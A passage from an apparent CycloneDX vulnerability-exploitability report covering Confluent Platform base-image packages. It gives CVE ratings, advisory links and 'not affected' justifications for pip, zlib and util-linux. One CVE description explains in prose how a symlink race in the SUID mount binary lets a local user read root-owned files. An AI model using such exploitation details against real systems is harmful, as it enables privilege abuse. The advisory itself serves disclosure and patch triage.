          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-27171",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27171"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/"
        },
        {
          "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27171"
        },
        {
          "url": "https://github.com/advisories/GHSA-h858-mf2m-8jf4"
        },
        {
          "url": "https://github.com/madler/zlib/issues/904"
        },
        {
          "url": "https://github.com/madler/zlib/releases/tag/v1.3.2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27171"
        }
      ],
      "published": "2026-02-18T04:16:01+00:00",
      "updated": "2026-06-17T10:26:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.2.11-25.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-27456",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        59,
        269,
        367
      ],
      "description": "util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27456"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27456"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27456"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-jgcxwcxt3sxd.toml"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/releases/tag/v2.41.4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27456"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27456"
        }
      ],
      "published": "2026-04-03T22:16:25+00:00",
      "updated": "2026-07-24T22:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
